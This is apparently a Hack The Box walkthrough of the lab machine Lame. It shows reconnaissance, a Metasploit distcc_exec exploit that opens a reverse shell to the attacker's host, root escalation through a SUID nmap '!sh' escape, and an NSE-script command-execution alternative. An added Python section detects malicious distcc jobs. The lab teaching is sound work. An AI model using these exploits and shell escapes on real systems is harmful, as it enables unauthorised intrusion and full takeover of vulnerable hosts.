Hack the Box Walkthrough – LAME machine
New walkthrough today about the easy machine LAME from Hack The Box. Judging by the number of owns, it is probably one of the easiest machines on HTB.
Let's jump in!
As usual, we start with an nmap scan (all ports, version detection and default scripts) to see what we are dealing with.
kali@kali:~/Documents$ nmap -sC -sV -oA nmap 10.129.55.194 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 03:42 EST
Nmap scan report for 10.129.55.194
Host is up (0.026s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h32m53s, deviation: 3h32m10s, median: 2m51s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-11-28T03:47:43-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.65 seconds
FTP is open and allows anonymous login, so let's have a look:
kali@kali:~/Documents$ ftp 10.129.55.194
Connected to 10.129.55.194.
220 (vsFTPd 2.3.4)
Name (10.129.55.194:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
The anonymous FTP share is empty. Samba is also running, so let's take a quick look at it:
kali@kali:~/Documents$ smbclient -L 10.129.55.194
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
Hmm, protocol negotiation failed. Samba 3.0.20 only speaks SMB1 (NT1), which recent versions of smbclient refuse to use by default.
A quick Google search gave the solution: edit /etc/samba/smb.conf on the Kali box and add the following under the [global] section:
client min protocol = NT1
Let's try again:
kali@kali:~/Documents$ smbclient -L 10.129.55.194
Enter WORKGROUP\kali's password:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME
Maybe there is something interesting in the tmp share:
kali@kali:~/Documents$ smbclient --no-pass //10.129.55.194/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 28 04:01:12 2020
  ..                                 DR        0  Sat Oct 31 03:33:58 2020
  .ICE-unix                          DH        0  Sat Nov 28 03:41:15 2020
  vmware-root                        DR        0  Sat Nov 28 03:41:38 2020
  .X11-unix                          DH        0  Sat Nov 28 03:41:42 2020
  .X0-lock                           HR       11  Sat Nov 28 03:41:42 2020
  5581.jsvc_up                        R        0  Sat Nov 28 03:42:29 2020
  vgauthsvclog.txt.0                  R     1600  Sat Nov 28 03:41:13 2020

		7282168 blocks of size 1024. 5385868 blocks available
Nope, nothing useful. What about the opt share?
kali@kali:~/Documents$ smbclient --no-pass //10.129.55.194/opt
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
OK, then there is port 3632 open for distcc.
From Wikipedia, we know that distcc is a tool for speeding up compilation of source code by using distributed computing over a computer network.
A search with searchsploit gives a nice result: the Metasploit module unix/misc/distcc_exec.
Let's give it a try.
There are only two options to set:
I then added a payload and configured it.
Time now to run our exploit:
msf6 exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 10.10.14.106:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo mm0VQUXWQUFfriyg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.106:4444 -> 10.129.31.153:38737) at 2020-11-28 08:35:44 -0500
And we have a shell, running as the distcc daemon user!
Running linpeas showed that nmap is installed and may help with our privilege escalation.
Indeed, the interactive mode of this old nmap (4.53) can be used to execute shell commands, and because the nmap binary on this box runs with root privileges (it is SUID root), the shell it spawns is root as well.
daemon@lame:/tmp$ nmap --interactive
nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
And we are root!
Other ways to do it
I read that we could also use nmap itself, with the distcc NSE script, to get our foothold shell.
kali@kali:~$ sudo wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
[sudo] password for kali:
--2020-11-28 09:01:51--  https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse
Resolving svn.nmap.org (svn.nmap.org)... 188.8.131.52, 2600:3c01:e000:3e6::6d4e:7061
Connecting to svn.nmap.org (svn.nmap.org)|184.108.40.206|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3519 (3.4K) [text/plain]
Saving to: ‘/usr/share/nmap/scripts/distcc-exec.nse’

/usr/share/nmap/scripts/distcc-exec.nse   100%[=======================================================================================================================================>]   3.44K  --.-KB/s    in 0s

2020-11-28 09:01:52 (128 MB/s) - ‘/usr/share/nmap/scripts/distcc-exec.nse’ saved [3519/3519]
Then run the following command:
kali@kali:~$ nmap -p 3632 10.129.31.153 --script distcc-exec --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 09:03 EST
Nmap scan report for 10.129.31.153
Host is up (0.025s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|     References:
|       https://distcc.github.io/security.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
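The NSE output above calls CVE-2004-2687 a weak-configuration problem: distccd happily runs whatever program the client names in argv[0]. As an added defensive example (my own code, not part of this walkthrough or of distcc), here is a small parser for the distcc v1 request header that flags jobs whose argv[0] is not a compiler, the kind of check a network sensor or a distccd wrapper could apply. The DIST/ARGC/ARGV token layout is my reading of the distcc protocol, and both requests are constructed samples.

```python
import re

# Compilers a hardened distccd should be limited to; anything else in argv[0]
# means the daemon is being used as a generic command runner.
ALLOWED_COMPILERS = {"cc", "gcc", "g++", "c++", "clang", "clang++"}

# distcc v1 request tokens: 4-letter name + 8 hex digits
# (version for DIST, count for ARGC, byte length for ARGV).
TOKEN = re.compile(rb"([A-Z]{4})([0-9a-fA-F]{8})")


def parse_request(data: bytes):
    """Return (protocol_version, argv) parsed from the start of a client request."""
    pos = 0

    def read_token(expected: bytes) -> int:
        nonlocal pos
        m = TOKEN.match(data, pos)
        if m is None or m.group(1) != expected:
            raise ValueError(f"expected {expected.decode()} token at offset {pos}")
        pos = m.end()
        return int(m.group(2).decode(), 16)

    version = read_token(b"DIST")
    argc = read_token(b"ARGC")
    argv = []
    for _ in range(argc):
        length = read_token(b"ARGV")
        if pos + length > len(data):
            raise ValueError("truncated ARGV value")
        argv.append(data[pos:pos + length].decode("utf-8", "replace"))
        pos += length
    return version, argv


def is_suspicious(argv) -> bool:
    """True when the job would not run a compiler from the allowlist."""
    if not argv:
        return True
    program = argv[0].rsplit("/", 1)[-1]  # tolerate paths such as /usr/bin/gcc
    return program not in ALLOWED_COMPILERS


def audit(data: bytes) -> str:
    """One-line verdict suitable for a log entry or alert."""
    version, argv = parse_request(data)
    verdict = "SUSPICIOUS" if is_suspicious(argv) else "ok"
    return f"distcc v{version} {verdict}: {' '.join(argv)}"


# Constructed samples: a normal compile job and a job that hands distccd a shell.
COMPILE_JOB = (b"DIST00000001ARGC00000005ARGV00000003gccARGV00000002-c"
               b"ARGV00000006main.cARGV00000002-oARGV00000006main.o")
SHELL_JOB = b"DIST00000001ARGC00000003ARGV00000002shARGV00000002-cARGV00000002id"
```

Running audit() over both samples reports the compile job as ok and the shell job as SUSPICIOUS; restricting distccd with its --allow option and a proper allowlist of compilers is the actual fix the distcc security page recommends.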
Reading the official HTB write-up afterwards, there was an even easier way.
They used the Metasploit module exploit/multi/samba/usermap_script (the Samba 3.0.20 "username map script" command execution) and got root directly, without any privilege escalation step.